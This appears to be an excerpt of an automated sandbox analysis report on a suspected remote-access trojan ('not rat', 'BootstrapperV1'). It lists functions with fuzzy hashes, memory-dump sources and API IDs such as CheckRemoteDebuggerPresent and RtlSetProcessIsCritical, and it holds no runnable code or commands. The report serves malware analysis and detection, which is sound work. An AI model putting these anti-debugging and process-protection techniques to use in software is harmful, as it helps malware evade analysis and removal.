                                                                                                                                                                                                                                              • Instruction ID: d4151b16ef87ceff1b557feba3b4c615fdd2512d7c3800b159a77d7394db8f96
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c1955d8bf54e21088d54ccfb7e34cf4c290cd1a0692783467db1a7a2b7b444e9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C411770A1CA498FDB19EF68D8466F97BE1EF65315F00427FD049C3292CA65A816C7C1
                                                                                                                                                                                                                                              Function 00007FFB4B0F9278 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 136 7ffb4b0f9278-7ffb4b0f927f 137 7ffb4b0f9281-7ffb4b0f9286 136->137
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.2638983025.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb4b0f0000_not rat.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CriticalProcess
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2695349919-0
                                                                                                                                                                                                                                              • Opcode ID: ec31d14317830cb5aa9f49a72c57a8d949fdbfe3a80415f103ce06cc95fded8a
                                                                                                                                                                                                                                              • Instruction ID: 8a75e8479cb21dca3355221969be58f1d61f6815029f36485d1f6375a5a6d04c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ec31d14317830cb5aa9f49a72c57a8d949fdbfe3a80415f103ce06cc95fded8a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E441D27190CB488FDB69DFA8D845AE97BE0FF65311F04412EE08AD3292DB74A846C791
                                                                                                                                                                                                                                              Function 00007FFB4B0F7631 Relevance: 1.6, APIs: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 138 7ffb4b0f7631-7ffb4b0f76ed CheckRemoteDebuggerPresent 142 7ffb4b0f76f5-7ffb4b0f7738 138->142 143 7ffb4b0f76ef 138->143 143->142
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.2638983025.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb4b0f0000_not rat.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3662101638-0
                                                                                                                                                                                                                                              • Opcode ID: 496578133cfce1a1a94855625853a7e7765263995bac2ff74d89b9097a559553
                                                                                                                                                                                                                                              • Instruction ID: 18cad1c344deeb885dbe3e4b3cbc790f5704961bfdca2665d564cd937c9256e5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 496578133cfce1a1a94855625853a7e7765263995bac2ff74d89b9097a559553
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8931237190875C8FCB58DF68C88A7E97BE0FF65311F0442AAD489D7282DB34A842CB91
                                                                                                                                                                                                                                              Function 00007FFB4B0F9288 Relevance: 1.6, APIs: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 145 7ffb4b0f9288-7ffb4b0f9350 RtlSetProcessIsCritical 150 7ffb4b0f9358-7ffb4b0f938d 145->150 151 7ffb4b0f9352 145->151 151->150
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.2638983025.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb4b0f0000_not rat.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CriticalProcess
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2695349919-0
                                                                                                                                                                                                                                              • Opcode ID: 99e32ce2308d239716187e6fc1fcf8c1e96e7a3615886cbca36fd459636f5531
                                                                                                                                                                                                                                              • Instruction ID: 2f3e773edbd62206cb0fa9b073388b82c592ac9f94bae425724d473205a838e0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99e32ce2308d239716187e6fc1fcf8c1e96e7a3615886cbca36fd459636f5531
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA31E47190CB588FDB28DF58D8456E97BE0FF65311F04412EE08AD3692DB746846CB91

                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                              Function 00007FFB4B0F6EC0 Relevance: 2.6, Strings: 1, Instructions: 1333COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: \
                                                                                                                                                                                                                                              • API String ID: 0-2967466578
                                                                                                                                                                                                                                              • Opcode ID: 083d42e181f4e1c692bc842cc2a92caada353da545c7f692979ea6fce1a467a6
                                                                                                                                                                                                                                              • Instruction ID: 510bdae1c5c1dd66a90b89273f8b3fa7c4a510f84c8fed5a56debdcddf10dfd1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 083d42e181f4e1c692bc842cc2a92caada353da545c7f692979ea6fce1a467a6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF9248A0B1CA454FE759AF3CC495A7977D1EF89301F1481BED58EC32A3DD68B8468382
                                                                                                                                                                                                                                              Function 00007FFB4B0F2BAA Relevance: 1.9, Strings: 1, Instructions: 623COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 0-3916222277
                                                                                                                                                                                                                                              • Opcode ID: f415f78e59f9d1ec74b9552592bf0464960f9d0a2912d689e64031be3cfb04c1
                                                                                                                                                                                                                                              • Instruction ID: 3ab53765e24cf83d5d713edecdc6ee92259479392458390a3bbbb7bd0097a60d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f415f78e59f9d1ec74b9552592bf0464960f9d0a2912d689e64031be3cfb04c1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D2206B161CB868FD759DF38C044AA2BBD1FFA5311F0486BED48A873A2DE64E445C781
                                                                                                                                                                                                                                              Function 00007FFB4B0E7120 Relevance: .9, Instructions: 885COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 57f16631ebb2ab63deb1c43508a8cf901df2a07b85c2a7f3021a2ef923eb34f0
                                                                                                                                                                                                                                              • Instruction ID: 94a541ea9787720ffaaf6f43c7f68622b19ee9888d534102c87a996f4bcf6a2a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 57f16631ebb2ab63deb1c43508a8cf901df2a07b85c2a7f3021a2ef923eb34f0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34527F70A1CA499FDB98EF2CC855AA937E2FFA8345F0541B9E44DD33A1CE64E841C781
                                                                                                                                                                                                                                              Function 00007FFB4B0E7000 Relevance: .4, Instructions: 377COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: e62d8bc90e784d48805465c5f849467b9805550800c0fc3f45da0d854de2e93a
                                                                                                                                                                                                                                              • Instruction ID: 8b36ab132fa77186595b22d6bececf8fb7aafc07570f954fcce24ad0baf71836
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e62d8bc90e784d48805465c5f849467b9805550800c0fc3f45da0d854de2e93a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15C1A670A1CA4D5FDF95EF2CC445AAA3BE1FF69351B0441BAE54DD33A2CA24E841C781
                                                                                                                                                                                                                                              Function 00007FFB4B0F9349 Relevance: 8.0, Strings: 6, Instructions: 482COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: @J K$PJ K$XL K$d$hL K$xL K
                                                                                                                                                                                                                                              • API String ID: 0-1846992891
                                                                                                                                                                                                                                              • Opcode ID: 8b2a2b643eb362077d6ef700cd49f72329f1d1f08e9b3ddf013e0c4be5782a01
                                                                                                                                                                                                                                              • Instruction ID: 84136d337e351346fd42e570037d84c230fc5d2c2998af7f87877105f74df63a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b2a2b643eb362077d6ef700cd49f72329f1d1f08e9b3ddf013e0c4be5782a01
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4FF17BB1A0DB854FD315AF2CD8559757BE0FF92315B0881FEC2898B2A7D964F806C781
                                                                                                                                                                                                                                              Function 00007FFB4B0FA951 Relevance: 6.4, Strings: 5, Instructions: 139COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: Pd K$`d K$hd K$pd K$xd K
                                                                                                                                                                                                                                              • API String ID: 0-558404148
                                                                                                                                                                                                                                              • Opcode ID: 3273af89a565c4f3a7964b8aee3305ffc82ee8b57a1242cf0a9d5c845321b8f5
                                                                                                                                                                                                                                              • Instruction ID: 5e1f724a67a0d03bc2f9fb974c5117b5fdc72d437431dce125128dfe26ae80cb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3273af89a565c4f3a7964b8aee3305ffc82ee8b57a1242cf0a9d5c845321b8f5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E417DD3A0E6C20BE3139E7CEDD65A8BFB0EF5121570C81F6D18887293ED19540B8392
                                                                                                                                                                                                                                              Function 00007FFB4B0F96FA Relevance: 5.2, Strings: 4, Instructions: 219COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: Pf K$`f K$hf K$pf K
                                                                                                                                                                                                                                              • API String ID: 0-2161957192
                                                                                                                                                                                                                                              • Opcode ID: e1518f8922284b8373b48ee7abc459330d47ce942b2aec5a55e5db0e73ed5d6a
                                                                                                                                                                                                                                              • Instruction ID: 5e7fcce6a4c0cb0c12e193465af4c22d7f9941969545a41caa8ab901574b2b56
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e1518f8922284b8373b48ee7abc459330d47ce942b2aec5a55e5db0e73ed5d6a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB71F6B0A0C6898FDB55EF3CC885AE93BE1FF69305F0541B9E54DC72A2CA64E845C781
                                                                                                                                                                                                                                              Function 00007FFB4B0EF1E1 Relevance: 1.9, Strings: 1, Instructions: 644COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: QM_^
                                                                                                                                                                                                                                              • API String ID: 0-2605159456
                                                                                                                                                                                                                                              • Opcode ID: 6ac97050c20ae0e06e933633884c5caea032390d487251ff2ce29b86e7b7c972
                                                                                                                                                                                                                                              • Instruction ID: 3e0ab24c1fe6b0678d98d340e826e75f7f9a67f45e1990385cb098468da0339d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ac97050c20ae0e06e933633884c5caea032390d487251ff2ce29b86e7b7c972
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 48713C72A0D6499BF311BF3CE4455F877A0EF96322F1842BAD18DC71A3DE1864064791
                                                                                                                                                                                                                                              Function 00007FFB4B0FB02C Relevance: 1.7, Strings: 1, Instructions: 454COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: d
                                                                                                                                                                                                                                              • API String ID: 0-2564639436
                                                                                                                                                                                                                                              • Opcode ID: 4ddb06cb0d59afbbed80f70d7d976ac3a379dce66e04c492a24b3386ca4630fa
                                                                                                                                                                                                                                              • Instruction ID: 134c9611721baa685d46d7027013b37a32a615a4510b1726acb0471316f91d6c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ddb06cb0d59afbbed80f70d7d976ac3a379dce66e04c492a24b3386ca4630fa
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71E1F2B0A1CB494FD769EF28C844A7577E1FF95301F1445BED18AC72A2DE78E8428B41
                                                                                                                                                                                                                                              Function 00007FFB4B0F94A8 Relevance: 1.7, Strings: 1, Instructions: 444COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: d
                                                                                                                                                                                                                                              • API String ID: 0-2564639436
                                                                                                                                                                                                                                              • Opcode ID: ab7b2253d829fb06e2eb63f481ed08961d1836737bfdf3028b4d1fc5b4d2915c
                                                                                                                                                                                                                                              • Instruction ID: 317eb9856b68398307a8a66f64954eca673c38eadad74be2f15323ea66771fea
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab7b2253d829fb06e2eb63f481ed08961d1836737bfdf3028b4d1fc5b4d2915c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03D132B0A1CB454BD729EF2CD481AB5B3E0FF95315B14857DD28A832A2DA35F8438B81
                                                                                                                                                                                                                                              Function 00007FFB4B0EA9EA Relevance: 1.7, Strings: 1, Instructions: 425COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: d
                                                                                                                                                                                                                                              • API String ID: 0-2564639436
                                                                                                                                                                                                                                              • Opcode ID: 4421f0c734596f2bdfae55205c7599be98671dc8bf91517a1052e3a54e60fea8
                                                                                                                                                                                                                                              • Instruction ID: 435b934d991897ed27b1fe79e3c715c1452d86dfd8c9d00f879f143d136bc21b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4421f0c734596f2bdfae55205c7599be98671dc8bf91517a1052e3a54e60fea8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00C1E1B0A1CB4A4FD769EF28C580575B7E1FF99301B1885BDD18AC72A2DB25F8438781
                                                                                                                                                                                                                                              Function 00007FFB4B0E9110 Relevance: 1.6, Strings: 1, Instructions: 388COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: d
                                                                                                                                                                                                                                              • API String ID: 0-2564639436
                                                                                                                                                                                                                                              • Opcode ID: f4d7c1edbdf256508c390963758dfd94e9f6efe8ec63d97626538c6239d14278
                                                                                                                                                                                                                                              • Instruction ID: 7356c7ee5d17c3ade6a56d7fd3e6815b860cdac3292a551ef688d7bc6d4b1b24
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4d7c1edbdf256508c390963758dfd94e9f6efe8ec63d97626538c6239d14278
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42C1C0B0A1CB068FD769EE28C481575B3E1FF99301B14857DD58BC36A6DA35F8438781
                                                                                                                                                                                                                                              Function 00007FFB4B0F953D Relevance: 1.6, Strings: 1, Instructions: 367COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: d
                                                                                                                                                                                                                                              • API String ID: 0-2564639436
                                                                                                                                                                                                                                              • Opcode ID: 5427a1911f4357ec5409c83b72795ed56771034c7c1ae13d7df8fbb405bf3634
                                                                                                                                                                                                                                              • Instruction ID: 3ad1fb8d35c64af3b40c046ff44ad5896b3f2f72ac0b116847df99f6007d83b2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5427a1911f4357ec5409c83b72795ed56771034c7c1ae13d7df8fbb405bf3634
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91B14670A1CB464BC329EF2CD445AB577E0FF95315B14867ED18AC72A2CA35F8038B81
                                                                                                                                                                                                                                              Function 00007FFB4B0F1366 Relevance: 1.6, Strings: 1, Instructions: 341COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: *M_H
                                                                                                                                                                                                                                              • API String ID: 0-3551332076
                                                                                                                                                                                                                                              • Opcode ID: bf6ccc33c3915a7cdefdeb6481ea18b8ff0bdfeccb3c48181df0447ea82bca68
                                                                                                                                                                                                                                              • Instruction ID: a8ff0bde5dbff319c05ae68cecaefd24d73e97ff88cedb70169d4f6dcc41f897
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf6ccc33c3915a7cdefdeb6481ea18b8ff0bdfeccb3c48181df0447ea82bca68
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4DB1F9A1B0C98A4FEB85EF7CD4559A97BD2EF99345B0840B9D48DC7293DD68AC028780
                                                                                                                                                                                                                                              Function 00007FFB4B0FB524 Relevance: 1.5, Strings: 1, Instructions: 296COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: pL_H
                                                                                                                                                                                                                                              • API String ID: 0-1994359581
                                                                                                                                                                                                                                              • Opcode ID: ee8c1115aa0161e9e5d8f7217d63ac9e0632295323f3722400d2974d9644587b
                                                                                                                                                                                                                                              • Instruction ID: c8980dbe2144a1eb4bd228fa932ad224b2aca7443580c7f7652d1e7d2c49b2d2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee8c1115aa0161e9e5d8f7217d63ac9e0632295323f3722400d2974d9644587b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 959137B0A1CB4A8FD758EF38C4459B6B7D1FF55311B14867DD18AC32A6EE78E8428B40
                                                                                                                                                                                                                                              Function 00007FFB4B0E60D0 Relevance: 1.5, Strings: 1, Instructions: 218COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: H
                                                                                                                                                                                                                                              • API String ID: 0-2852464175
                                                                                                                                                                                                                                              • Opcode ID: 358b90d972f796b4e58b2c13529062cb6f20242ad8e98e399d0045773b669480
                                                                                                                                                                                                                                              • Instruction ID: 0deee70d2ab007fe3edeb474e8393b11f05ee10c5968544a1e99c9044ac94346
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 358b90d972f796b4e58b2c13529062cb6f20242ad8e98e399d0045773b669480
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72511892B0DA890FE7D5DA7C98655787FC1EF9925170840FBD98CC72B3DC486C068381
                                                                                                                                                                                                                                              Function 00007FFB4B0FF54E Relevance: 1.4, Strings: 1, Instructions: 167COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: "K
                                                                                                                                                                                                                                              • API String ID: 0-3357250965
                                                                                                                                                                                                                                              • Opcode ID: 84e19ec8baaa5c100f9f65509faa238b42d30f1265e17a190d4a7433df3dc117
                                                                                                                                                                                                                                              • Instruction ID: f14d09455a586298e8a65080878e84d33f66c37ff3eed349cba165776f6e76ef
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 84e19ec8baaa5c100f9f65509faa238b42d30f1265e17a190d4a7433df3dc117
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4441337170DB894FDB49EF2CD8559657BE1EF9A310B0441AEE48DC32A2DE61E802C781
                                                                                                                                                                                                                                              Function 00007FFB4B0EA12A Relevance: 1.4, Strings: 1, Instructions: 163COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: H
                                                                                                                                                                                                                                              • API String ID: 0-2852464175
                                                                                                                                                                                                                                              • Opcode ID: bf1fbc47f97e2c673b209345b8e2a00865a48f3c3b0b08a86abc59b16c71abb9
                                                                                                                                                                                                                                              • Instruction ID: 79aa2c50d4a975163d69950fe0753d375ab5878e71741fe501a3326ffac183dd
